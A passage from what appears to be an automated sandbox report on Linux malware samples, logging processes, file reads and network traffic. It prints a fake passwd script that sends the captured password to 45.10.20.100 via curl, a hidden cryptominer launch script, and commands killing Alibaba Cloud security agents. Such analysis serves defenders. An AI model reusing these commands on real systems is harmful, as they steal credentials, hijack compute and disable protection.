http://45.10.20.100:1010/pass?pass=$pass &> /dev/null if [ "$passvar1" != "$passvar2" ]; then echo -e echo 'Sorry, passwords do not match.' echo 'passwd: Have exhausted maximum number of retries for service' sleep 0.2 else echo -e echo 'passwd: all authentication tokens updated successfully.' sleep 0.2 fi fi /tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973]

/usr/bin/whoami

[whoami]

/usr/bin/sleep

[sleep 0.1]

/usr/bin/sleep

[sleep 0.1]

/usr/bin/base64

[base64]

/usr/bin/curl

[curl -s http://45.10.20.100:1010/pass?pass=cm9vdAo=]

/usr/bin/sleep

[sleep 0.2]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
NL 45.10.20.100:1010 tcp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:45

Platform

debian9-armhf-20240611-en

Max time kernel

0s

Command Line

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Signatures

N/A

Processes

/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Network

N/A

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

debian9-mipsbe-20240611-en

Max time kernel

9s

Command Line

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Signatures

N/A

Processes

/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Network

N/A

Files

N/A

Analysis: behavioral17

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

0s

Max time network

131s

Command Line

[/tmp/xrx/init.sh]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/983/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1081/cmdline /usr/bin/pidof N/A
File opened for reading /proc/6/cmdline /usr/bin/pidof N/A
File opened for reading /proc/26/stat /usr/bin/pidof N/A
File opened for reading /proc/216/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1282/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1353/stat /usr/bin/pidof N/A
File opened for reading /proc/12/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1065/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1095/stat /usr/bin/pidof N/A
File opened for reading /proc/102/stat /usr/bin/pidof N/A
File opened for reading /proc/505/stat /usr/bin/pidof N/A
File opened for reading /proc/825/stat /usr/bin/pidof N/A
File opened for reading /proc/1129/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1568/stat /usr/bin/pidof N/A
File opened for reading /proc/6/stat /usr/bin/pidof N/A
File opened for reading /proc/74/cmdline /usr/bin/pidof N/A
File opened for reading /proc/79/stat /usr/bin/pidof N/A
File opened for reading /proc/995/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1129/stat /usr/bin/pidof N/A
File opened for reading /proc/1574/stat /usr/bin/pidof N/A
File opened for reading /proc/5/stat /usr/bin/pidof N/A
File opened for reading /proc/101/stat /usr/bin/pidof N/A
File opened for reading /proc/113/stat /usr/bin/pidof N/A
File opened for reading /proc/428/stat /usr/bin/pidof N/A
File opened for reading /proc/1161/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1163/stat /usr/bin/pidof N/A
File opened for reading /proc/1261/stat /usr/bin/pidof N/A
File opened for reading /proc/1567/stat /usr/bin/pidof N/A
File opened for reading /proc/27/cmdline /usr/bin/pidof N/A
File opened for reading /proc/82/stat /usr/bin/pidof N/A
File opened for reading /proc/92/cmdline /usr/bin/pidof N/A
File opened for reading /proc/824/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1167/stat /usr/bin/pidof N/A
File opened for reading /proc/83/cmdline /usr/bin/pidof N/A
File opened for reading /proc/97/stat /usr/bin/pidof N/A
File opened for reading /proc/630/stat /usr/bin/pidof N/A
File opened for reading /proc/96/cmdline /usr/bin/pidof N/A
File opened for reading /proc/162/cmdline /usr/bin/pidof N/A
File opened for reading /proc/210/stat /usr/bin/pidof N/A
File opened for reading /proc/262/stat /usr/bin/pidof N/A
File opened for reading /proc/534/stat /usr/bin/pidof N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/4/cmdline /usr/bin/pidof N/A
File opened for reading /proc/8/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1253/cmdline /usr/bin/pidof N/A
File opened for reading /proc/858/stat /usr/bin/pidof N/A
File opened for reading /proc/1169/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1231/stat /usr/bin/pidof N/A
File opened for reading /proc/83/stat /usr/bin/pidof N/A
File opened for reading /proc/92/stat /usr/bin/pidof N/A
File opened for reading /proc/224/stat /usr/bin/pidof N/A
File opened for reading /proc/1282/stat /usr/bin/pidof N/A
File opened for reading /proc/1440/stat /usr/bin/pidof N/A
File opened for reading /proc/9/stat /usr/bin/pidof N/A
File opened for reading /proc/11/cmdline /usr/bin/pidof N/A
File opened for reading /proc/15/cmdline /usr/bin/pidof N/A
File opened for reading /proc/851/stat /usr/bin/pidof N/A
File opened for reading /proc/993/stat /usr/bin/pidof N/A
File opened for reading /proc/2/stat /usr/bin/pidof N/A
File opened for reading /proc/218/cmdline /usr/bin/pidof N/A
File opened for reading /proc/667/stat /usr/bin/pidof N/A
File opened for reading /proc/1056/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1107/stat /usr/bin/pidof N/A

Processes

/tmp/xrx/init.sh

[/tmp/xrx/init.sh]

/bin/bash

[/tmp/xrx/init.sh -c exec '/tmp/xrx/init.sh' "$@" /tmp/xrx/init.sh]

/tmp/xrx/init.sh

[/tmp/xrx/init.sh]

/bin/bash

[/tmp/xrx/init.sh -c #!/bin/bash if [[ $(cat config.json | grep xxcountxx) ]]; then echo "configuring miner" sed -i "s/xxcountxx/$(nproc)/g" config.json else echo "using preconfigured miner" fi PID=$(pidof xrx) if [ $# -eq 0 ]; then ##if no arguments if [ -z "${PID}" ]; then ./xrx </dev/null &>/dev/null & disown -h %1 echo "miner online" else echo "miner already online" fi fi /tmp/xrx/init.sh]

/usr/bin/grep

[grep xxcountxx]

/usr/bin/cat

[cat config.json]

/usr/bin/pidof

[pidof xrx]

/tmp/xrx/xrx

[./xrx]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral20

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

debian9-armhf-20240611-en

Max time kernel

141s

Command Line

[/tmp/xrx/scp]

Signatures

N/A

Processes

/tmp/xrx/scp

[/tmp/xrx/scp]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

0s

Max time network

132s

Command Line

[/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/388/stat /usr/bin/pidof N/A
File opened for reading /proc/1052/stat /usr/bin/pidof N/A
File opened for reading /proc/1078/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1254/stat /usr/bin/pidof N/A
File opened for reading /proc/1341/cmdline /usr/bin/pidof N/A
File opened for reading /proc/37/cmdline /usr/bin/pidof N/A
File opened for reading /proc/40/stat /usr/bin/pidof N/A
File opened for reading /proc/198/stat /usr/bin/pidof N/A
File opened for reading /proc/2279/stat /usr/bin/pidof N/A
File opened for reading /proc/2836/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1129/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1401/stat /usr/bin/pidof N/A
File opened for reading /proc/2139/stat /usr/bin/pidof N/A
File opened for reading /proc/2566/stat /usr/bin/pidof N/A
File opened for reading /proc/39/stat /usr/bin/pidof N/A
File opened for reading /proc/188/stat /usr/bin/pidof N/A
File opened for reading /proc/762/cmdline /usr/bin/pidof N/A
File opened for reading /proc/2034/stat /usr/bin/pidof N/A
File opened for reading /proc/2261/stat /usr/bin/pidof N/A
File opened for reading /proc/2306/stat /usr/bin/pidof N/A
File opened for reading /proc/2325/stat /usr/bin/pidof N/A
File opened for reading /proc/2352/stat /usr/bin/pidof N/A
File opened for reading /proc/27/stat /usr/bin/pidof N/A
File opened for reading /proc/437/stat /usr/bin/pidof N/A
File opened for reading /proc/586/stat /usr/bin/pidof N/A
File opened for reading /proc/2327/cmdline /usr/bin/pidof N/A
File opened for reading /proc/32/cmdline /usr/bin/pidof N/A
File opened for reading /proc/192/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1061/stat /usr/bin/pidof N/A
File opened for reading /proc/2209/stat /usr/bin/pidof N/A
File opened for reading /proc/2231/stat /usr/bin/pidof N/A
File opened for reading /proc/2352/cmdline /usr/bin/pidof N/A
File opened for reading /proc/2553/cmdline /usr/bin/pidof N/A
File opened for reading /proc/2627/stat /usr/bin/pidof N/A
File opened for reading /proc/30/cmdline /usr/bin/pidof N/A
File opened for reading /proc/509/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1058/cmdline /usr/bin/pidof N/A
File opened for reading /proc/35/stat /usr/bin/pidof N/A
File opened for reading /proc/56/stat /usr/bin/pidof N/A
File opened for reading /proc/2212/cmdline /usr/bin/pidof N/A
File opened for reading /proc/2329/cmdline /usr/bin/pidof N/A
File opened for reading /proc/2424/stat /usr/bin/pidof N/A
File opened for reading /proc/7/stat /usr/bin/pidof N/A
File opened for reading /proc/26/stat /usr/bin/pidof N/A
File opened for reading /proc/34/stat /usr/bin/pidof N/A
File opened for reading /proc/2129/cmdline /usr/bin/pidof N/A
File opened for reading /proc/2767/cmdline /usr/bin/pidof N/A
File opened for reading /proc/13/cmdline /usr/bin/pidof N/A
File opened for reading /proc/33/cmdline /usr/bin/pidof N/A
File opened for reading /proc/40/cmdline /usr/bin/pidof N/A
File opened for reading /proc/2037/cmdline /usr/bin/pidof N/A
File opened for reading /proc/2321/stat /usr/bin/pidof N/A
File opened for reading /proc/2831/stat /usr/bin/pidof N/A
File opened for reading /proc/2831/cmdline /usr/bin/pidof N/A
File opened for reading /proc/50/cmdline /usr/bin/pidof N/A
File opened for reading /proc/741/stat /usr/bin/pidof N/A
File opened for reading /proc/1065/stat /usr/bin/pidof N/A
File opened for reading /proc/2827/stat /usr/bin/pidof N/A
File opened for reading /proc/2827/cmdline /usr/bin/pidof N/A
File opened for reading /proc/51/cmdline /usr/bin/pidof N/A
File opened for reading /proc/2317/cmdline /usr/bin/pidof N/A
File opened for reading /proc/2642/cmdline /usr/bin/pidof N/A
File opened for reading /proc/43/stat /usr/bin/pidof N/A
File opened for reading /proc/824/stat /usr/bin/pidof N/A

Processes

/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B

[/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B -c exec '/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B' "$@" /tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B]

/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B

[/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B -c #!/bin/bash if [[ $(cat config.json | grep xxcountxx) ]]; then echo "configuring miner" sed -i "s/xxcountxx/$(nproc)/g" config.json else echo "using preconfigured miner" fi PID=$(pidof xrx) if [ $# -eq 0 ]; then ##if no arguments if [ -z "${PID}" ]; then ./xrx </dev/null &>/dev/null & disown -h %1 echo "miner online" else echo "miner already online" fi fi /tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B]

/usr/bin/cat

[cat config.json]

/usr/bin/grep

[grep xxcountxx]

/usr/bin/pidof

[pidof xrx]

/tmp/样本/Linux/shc加密脚本/xrx

[./xrx]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral19

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

140s

Max time network

130s

Command Line

[/tmp/xrx/scp]

Signatures

N/A

Processes

/tmp/xrx/scp

[/tmp/xrx/scp]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.1.91:443 tcp
US 151.101.1.91:443 tcp
GB 89.187.167.7:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 84.17.50.9:443 1527653184.rsc.cdn77.org tcp

Files

N/A

Analysis: behavioral24

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

ubuntu1804-amd64-20240729-en

Max time kernel

0s

Max time network

131s

Command Line

[/tmp/xrx/uninstall.sh]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/1284/stat /usr/bin/killall N/A
File opened for reading /proc/25/stat /usr/bin/killall N/A
File opened for reading /proc/1109/stat /usr/bin/killall N/A
File opened for reading /proc/204/cmdline /usr/bin/killall N/A
File opened for reading /proc/25/stat /usr/bin/killall N/A
File opened for reading /proc/1052/stat /usr/bin/killall N/A
File opened for reading /proc/83/stat /usr/bin/killall N/A
File opened for reading /proc/1305/stat /usr/bin/killall N/A
File opened for reading /proc/1305/cmdline /usr/bin/killall N/A
File opened for reading /proc/176/stat /usr/bin/killall N/A
File opened for reading /proc/204/stat /usr/bin/killall N/A
File opened for reading /proc/82/stat /usr/bin/killall N/A
File opened for reading /proc/78/stat /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/1113/stat /usr/bin/killall N/A
File opened for reading /proc/204/stat /usr/bin/killall N/A
File opened for reading /proc/566/stat /usr/bin/killall N/A
File opened for reading /proc/472/stat /usr/bin/killall N/A
File opened for reading /proc/9/stat /usr/bin/killall N/A
File opened for reading /proc/669/stat /usr/bin/killall N/A
File opened for reading /proc/1181/stat /usr/bin/killall N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/115/cmdline /usr/bin/killall N/A
File opened for reading /proc/1180/cmdline /usr/bin/killall N/A
File opened for reading /proc/1252/stat /usr/bin/killall N/A
File opened for reading /proc/979/stat /usr/bin/killall N/A
File opened for reading /proc/1235/stat /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/445/stat /usr/bin/killall N/A
File opened for reading /proc/1138/stat /usr/bin/killall N/A
File opened for reading /proc/245/stat /usr/bin/killall N/A
File opened for reading /proc/989/cmdline /usr/bin/killall N/A
File opened for reading /proc/1018/stat /usr/bin/killall N/A
File opened for reading /proc/168/stat /usr/bin/killall N/A
File opened for reading /proc/204/cmdline /usr/bin/killall N/A
File opened for reading /proc/1129/cmdline /usr/bin/killall N/A
File opened for reading /proc/1076/stat /usr/bin/killall N/A
File opened for reading /proc/1167/cmdline /usr/bin/killall N/A
File opened for reading /proc/1032/stat /usr/bin/killall N/A
File opened for reading /proc/1129/cmdline /usr/bin/killall N/A
File opened for reading /proc/1080/cmdline /usr/bin/killall N/A
File opened for reading /proc/323/cmdline /usr/bin/killall N/A
File opened for reading /proc/1061/stat /usr/bin/killall N/A
File opened for reading /proc/1472/cmdline /usr/bin/killall N/A
File opened for reading /proc/1125/cmdline /usr/bin/killall N/A
File opened for reading /proc/78/stat /usr/bin/killall N/A
File opened for reading /proc/163/stat /usr/bin/killall N/A
File opened for reading /proc/466/stat /usr/bin/killall N/A
File opened for reading /proc/649/cmdline /usr/bin/killall N/A
File opened for reading /proc/317/stat /usr/bin/killall N/A
File opened for reading /proc/411/cmdline /usr/bin/killall N/A
File opened for reading /proc/529/cmdline /usr/bin/killall N/A
File opened for reading /proc/600/stat /usr/bin/killall N/A
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/159/stat /usr/bin/killall N/A
File opened for reading /proc/600/stat /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A
File opened for reading /proc/1125/stat /usr/bin/killall N/A
File opened for reading /proc/1180/stat /usr/bin/killall N/A
File opened for reading /proc/36/stat /usr/bin/killall N/A
File opened for reading /proc/981/cmdline /usr/bin/killall N/A
File opened for reading /proc/203/stat /usr/bin/killall N/A
File opened for reading /proc/403/stat /usr/bin/killall N/A
File opened for reading /proc/1099/cmdline /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/xrx/uninstall.sh

[/tmp/xrx/uninstall.sh]

/bin/grep

[grep Gentoo]

/usr/bin/lsb_release

[lsb_release -a]

/usr/local/sbin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/usr/local/bin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/usr/sbin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/usr/bin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

Country Destination Domain Proto
US 151.101.1.91:443 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 1.1.1.1:53 ocp-ingress.fastly.gnome.org udp
US 151.101.1.91:443 ocp-ingress.fastly.gnome.org tcp
GB 84.17.50.8:443 tcp
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

debian9-mipsel-20240611-en

Max time kernel

3s

Command Line

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/36/stat /usr/bin/killall N/A
File opened for reading /proc/81/stat /usr/bin/killall N/A
File opened for reading /proc/17/stat /usr/bin/killall N/A
File opened for reading /proc/140/cmdline /usr/bin/killall N/A
File opened for reading /proc/77/stat /usr/bin/killall N/A
File opened for reading /proc/140/stat /usr/bin/killall N/A
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/693/stat /usr/bin/killall N/A
File opened for reading /proc/721/cmdline /usr/bin/killall N/A
File opened for reading /proc/74/stat /usr/bin/killall N/A
File opened for reading /proc/167/stat /usr/bin/killall N/A
File opened for reading /proc/9/stat /usr/bin/killall N/A
File opened for reading /proc/3/stat /usr/bin/killall N/A
File opened for reading /proc/9/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/70/stat /usr/bin/killall N/A
File opened for reading /proc/665/stat /usr/bin/killall N/A
File opened for reading /proc/140/stat /usr/bin/killall N/A
File opened for reading /proc/429/stat /usr/bin/killall N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/140/cmdline /usr/bin/killall N/A
File opened for reading /proc/148/stat /usr/bin/killall N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/720/stat /usr/bin/killall N/A
File opened for reading /proc/2/stat /usr/bin/killall N/A
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/10/stat /usr/bin/killall N/A
File opened for reading /proc/721/cmdline /usr/bin/killall N/A
File opened for reading /proc/675/stat /usr/bin/killall N/A
File opened for reading /proc/116/cmdline /usr/bin/killall N/A
File opened for reading /proc/348/stat /usr/bin/killall N/A
File opened for reading /proc/82/stat /usr/bin/killall N/A
File opened for reading /proc/37/stat /usr/bin/killall N/A
File opened for reading /proc/82/stat /usr/bin/killall N/A
File opened for reading /proc/1/stat /usr/bin/killall N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A
File opened for reading /proc/693/cmdline /usr/bin/killall N/A
File opened for reading /proc/377/stat /usr/bin/killall N/A
File opened for reading /proc/71/stat /usr/bin/killall N/A
File opened for reading /proc/378/stat /usr/bin/killall N/A
File opened for reading /proc/148/stat /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/82/stat /usr/bin/killall N/A
File opened for reading /proc/71/stat /usr/bin/killall N/A
File opened for reading /proc/116/stat /usr/bin/killall N/A
File opened for reading /proc/669/stat /usr/bin/killall N/A
File opened for reading /proc/84/stat /usr/bin/killall N/A
File opened for reading /proc/724/stat /usr/bin/killall N/A
File opened for reading /proc/75/stat /usr/bin/killall N/A
File opened for reading /proc/692/cmdline /usr/bin/killall N/A
File opened for reading /proc/724/stat /usr/bin/killall N/A
File opened for reading /proc/377/stat /usr/bin/killall N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A
File opened for reading /proc/71/stat /usr/bin/killall N/A
File opened for reading /proc/724/stat /usr/bin/killall N/A
File opened for reading /proc/375/stat /usr/bin/killall N/A
File opened for reading /proc/377/stat /usr/bin/killall N/A
File opened for reading /proc/37/stat /usr/bin/killall N/A
File opened for reading /proc/78/stat /usr/bin/killall N/A
File opened for reading /proc/16/stat /usr/bin/killall N/A
File opened for reading /proc/721/stat /usr/bin/killall N/A
File opened for reading /proc/78/stat /usr/bin/killall N/A
File opened for reading /proc/692/cmdline /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

/bin/grep

[grep Gentoo]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

N/A

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

ubuntu2204-amd64-20240729-en

Max time kernel

0s

Max time network

131s

Command Line

[/tmp/样本/Linux/挖矿程序/9D099882A24757AC5033B0C675FECBE5]

Signatures

Xmrig_linux family

xmrig_linux

xmrig

miner xmrig_linux

Processes

/tmp/样本/Linux/挖矿程序/9D099882A24757AC5033B0C675FECBE5

[/tmp/样本/Linux/挖矿程序/9D099882A24757AC5033B0C675FECBE5]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

154s

Command Line

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\1AAF1A9F7877DC2C899D910A52F67F31.tar"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Processes

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\1AAF1A9F7877DC2C899D910A52F67F31.tar"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 100.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp

Files

N/A